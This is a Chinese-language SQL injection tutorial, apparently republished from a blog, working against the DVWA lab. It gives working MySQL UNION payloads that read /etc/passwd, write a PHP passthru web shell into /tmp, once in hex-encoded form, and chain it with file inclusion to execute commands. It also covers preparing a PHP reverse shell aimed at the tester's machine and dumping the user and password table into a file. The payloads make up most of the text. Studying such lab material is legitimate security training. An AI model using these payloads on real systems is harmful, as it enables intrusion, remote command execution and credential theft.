二十二、SQL注入(3)读取/写入/下载数据文件

1、读取文件

' union select null, load_file('/etc/passwd')--+

《二十二、SQL注入(3)读取/写入/下载数据文件》 burpsuite修改id参数提交
《二十二、SQL注入(3)读取/写入/下载数据文件》 loadfile读取文件结果

2、写入文件

mysql的默认家目录的属主属组都是mysql,想要写入的a.php放在/var/www/目录下(为方便http访问时执行命令),但/var/www/目录下的属主、属组为www-data,mysql用户没有权限写入,因此下面的命令会执行不成功。

' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+

《二十二、SQL注入(3)读取/写入/下载数据文件》 写入文件失败

' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "a.php" --+    //默认会放到/va/lib/mysql/dvwa/目录下

《二十二、SQL注入(3)读取/写入/下载数据文件》 不选择写入路径执行

《二十二、SQL注入(3)读取/写入/下载数据文件》 a.php放置路径

但是结合上一章节的文件包含漏洞,由于/tmp目录是一个特殊的目录,所有人具有rwx权限,是不是能利用上述的写入文件到/tmp目录下,然后结合之前的文件包含在include进来,达到想要的效果呢?

将文件写入到/tmp/aa.php

' union select null,"<?php passthru($_GET['cmd']); ?>" into dumpfile "/tmp/aa.php"--+

《二十二、SQL注入(3)读取/写入/下载数据文件》 aa.php写入/tmp/下

使用file include利用aa.php执行命令

《二十二、SQL注入(3)读取/写入/下载数据文件》 文件包含漏洞利用

3、使用反弹shell执行sql注入

复制反弹shell脚本

#/usr/share/webshells/php# cp php-reverse-shell.php /root/b.php  //复制反弹脚本到/root目录下

修改脚本反弹IP,为kali本机IP

《二十二、SQL注入(3)读取/写入/下载数据文件》 image.png

编码十六进制转换此反弹shell

cat b.php | xxd -ps | tr -d '\n'   //xxd为十六进制转换,使用tr删除转换后的换行,所有为一行输出

《二十二、SQL注入(3)读取/写入/下载数据文件》 显示超出了服务的范围

换一个方法,尝试将上面的一句话木马转换为16进制然后执行
<?php passthru($_GET['cmd']); ?>写入c.php中,并转换十六进制:

《二十二、SQL注入(3)读取/写入/下载数据文件》 转换十六进制

执行sql注入,并将十六进制数据写入/tmp/cc.php

' union select null,(0x3c3f70687020706173737468727528245f4745545b27636d64275d293b203f3e0a) INTO DUMPFILE "/tmp/cc.php" --+

查看/tmp/cc.php,已经是服务端转换后的代码了:

《二十二、SQL注入(3)读取/写入/下载数据文件》 查看cc.php
《二十二、SQL注入(3)读取/写入/下载数据文件》 执行结果

4、保存下载数据库

将用户名、密码表保存在职至/tmp/aa.db中

' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/aa.db'-- 

然后通过file include访问/tmp/aa.db文件

《二十二、SQL注入(3)读取/写入/下载数据文件》 用户名和密码

    原文作者:cybeyond
    原文地址: https://www.jianshu.com/p/310dd3831e17
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞